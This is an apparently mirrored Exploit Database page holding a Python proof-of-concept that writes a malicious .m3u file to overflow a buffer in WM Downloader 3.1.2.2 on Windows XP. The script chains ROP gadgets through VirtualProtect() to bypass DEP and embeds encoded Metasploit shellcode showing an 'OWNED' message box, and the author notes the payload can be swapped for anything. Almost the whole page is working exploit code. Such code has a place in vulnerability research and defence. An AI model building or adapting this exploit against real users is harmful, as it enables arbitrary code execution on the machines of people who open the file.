WM Downloader 3.1.2.2 2010.04.15 – ‘.m3u’ File Buffer Overflow (DEP Bypass)

• Exploit Database
• 175 阅读

• 作者： sickness
  日期： 2011-01-29
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16072/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  #!/usr/bin/env python # WM Downloader 3.1.2.2 2010.04.15 (.m3u) Buffer Overflow + DEP Bypass # Author: sickness # Download : http://mini-stream.net/wm-downloader/ # Tested : Windows XP Professional SP3 (EN) latest updates with IE8 and IE7 # DATE : 29/01/2011 ################################################################### # You might need to change the offset. # The payload can be replaced with whatever you want, there is enough space. # # Hello corelanc0d3r! # http://redmine.corelan.be:8800/projects/pvefindaddr ###################################################################   import sys   header='#EXTM3U\n' junk ='http://'+'\x90' * 17400 junk+='\x41'*17 eip='\x1E\x17\x80\x7C' # RETN junk2='\x41\x41\x41\x41'     rop ='\x77\x92\xD7\x5A' # PUSH ESP # MOV EAX,EDX # POP EDI # RETN rop+='\x42\xE8\xC1\x77' # PUSH EDI # POP EAX # POP EBP # RETN rop+='\x41\x41\x41\x41' # POP EBP rop+='\xBB\xA5\x72\x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4 rop+='\x41\x41\x41\x41' # POP EBP rop+='\x94\x28\xC2\x77' # ADD ESP,20 # POP EBP # RETN rop+='\x41\x41\x41\x41' # RETN 4 rop+='\x41\x41\x41\x41' # POP EBP   vp ='\xD4\x1A\x80\x7C' # VirtualProtect() vp+='WWWW' # SC vp+='XXXX' # SC vp+='YYYY' # Size vp+='ZZZZ' # Policy vp+='\xD0\x23\x10\x5D' # Writable Memory vp+='\x41\x41\x41\x41' # Compensate ADD ESP,20 vp+='\x41\x41\x41\x41' # Compensate ADD ESP,20   rop2 ='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x1F\xC1\xDD\x73' # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN rop2+='\x41\x41\x41\x41' # POP ESI rop2+='\x42\xE8\xC1\x77' # PUSH EDI # POP EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xBB\xA5\x72\x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xF5\xD7\xC1\x77' # ADD EAX,20 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP' rop2+='\xCF\x43\xDD\x73' # MOV DWORD PTR DS:[ESI+24],EAX # POP ESI # RETN rop2+='\x41\x41\x41\x41' # POP ESI rop2+='\x42\xE8\xC1\x77' # PUSH EDI # POP EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xBB\xA5\x72\x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xC3\xA9\xE5\x73' # XOR EAX,EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x2B\xEC\xC4\x77' # ADD EAX,100 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x46\x21\xE1\x73' # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN rop2+='\x41\x41\x41\x41' # POP ESI rop2+='\x42\xE8\xC1\x77' # PUSH EDI # POP EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xBB\xA5\x72\x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\xC3\xA9\xE5\x73' # XOR EAX,EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x1D\xEC\xC4\x77' # ADD EAX,40 # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x1D\x7D\x15\x77' # INC ESI # RETN rop2+='\x1D\x7D\x15\x77' # INC ESI # RETN rop2+='\x1D\x7D\x15\x77' # INC ESI # RETN rop2+='\x1D\x7D\x15\x77' # INC ESI # RETN rop2+='\x46\x21\xE1\x73' # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN rop2+='\x41\x41\x41\x41' # POP ESI rop2+='\x42\xE8\xC1\x77' # PUSH EDI # POP EAX # POP EBP # RETN rop2+='\x41\x41\x41\x41' # POP EBP rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\x1D\x2D\xE2\x73' # ADD EAX,4 # RETN rop2+='\xB1\x9C\x5C\x75' # PUSH EAX # POP EBP # RETN 4 rop2+='\x26\x25\xAA\x71' # MOV ESP,EBP # POP EBP # RETN rop2+='\x41\x41\x41\x41' # RETN 4 rop2+='\x41\x41\x41\x41' # POP EBP     # msfpayload windows/messagebox TITLE=OWNED TEXT="Feel the pwnsauce." R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x25\x09' -t c sc = ("\xd9\xe5\xd9\x74\x24\xf4\x5d\xb8\xe9\xf2\x97\x0f\x29\xc9\xb1" "\x43\x31\x45\x18\x03\x45\x18\x83\xed\x15\x10\x62\xd6\x0e\x4e" "\x54\x9d\xf4\x85\x56\x8c\x46\x12\xa8\xf9\xc2\x56\xbb\xc9\x81" "\x1f\x30\xa1\xe3\xc3\xc3\xf3\x03\x77\xad\xdb\x98\xb1\x6a\x53" "\x86\xc8\x79\x32\xb7\xe3\x81\x24\xd7\x88\x12\x83\x33\x04\xaf" "\xf7\xb0\x4e\x18\x70\xc7\x84\xd3\xca\xdf\xd3\xbe\xea\xde\x08" "\xdd\xdf\xa9\x45\x16\xab\x28\xb4\x66\x54\x1b\x88\x75\x06\xdf" "\xc8\xf2\x50\x1e\x07\xf7\x5f\x67\x73\xfc\x5b\x1b\xa0\xd5\xee" "\x02\x23\x7f\x35\xc5\xdf\xe6\xbe\xc9\x54\x6c\x9a\xcd\x6b\x99" "\x90\xe9\xe0\x5c\x4f\x78\xb2\x7a\x93\x1b\xf8\x31\xa3\xf2\x2a" "\xbc\x51\x8d\x11\xd7\x17\xc3\x9b\xc4\x7a\x33\x3c\xeb\x84\x3c" "\xca\x51\x7f\x79\xb3\x81\x9d\x0e\xcb\x2e\x46\xa2\x3b\xc0\x79" "\xbd\x43\x54\xc0\x49\xd4\x0b\xa7\x69\x65\xbc\x04\x5b\x4b\x58" "\x03\xee\xe0\xc5\xa1\x98\x5b\x22\x4c\x11\x85\x7c\xaf\x74\x4e" "\x08\x8d\x26\xf5\xa2\xb0\x8b\xb5\x34\xa8\x37\x94\xd2\xb0\xc8" "\xe7\xdc\x5b\x72\x40\x03\xbc\x12\x3f\x14\xf2\xa7\x8e\x41\x82" "\x7b\xd5\x70\x1a\x60\x7d\x1e\x32\x3e\x5e\x88\x39\xdf\xeb\x2b" "\xd6\x3f\x64\xdb\x48\x57\xa4\x57\xfd\xc2\xcc\xd1\x98\x69\x61" "\xef\xab\xf9\x35\x2b\x3e\x70\x24\x02\xec\xd0\xf4\x34\x42\x2b" "\x2a\x87\xa2\x83\x34\xbd\x2a")   nops = '\x90' * 150 rest = '\x90' * 3600   exploit =header+junk+eip+junk2+rop+vp+rop2+nops+sc+rest   file = open('evil.m3u','w') file.write(exploit) file.close() print 'Writing file, please wait ...\n' print 'Done!'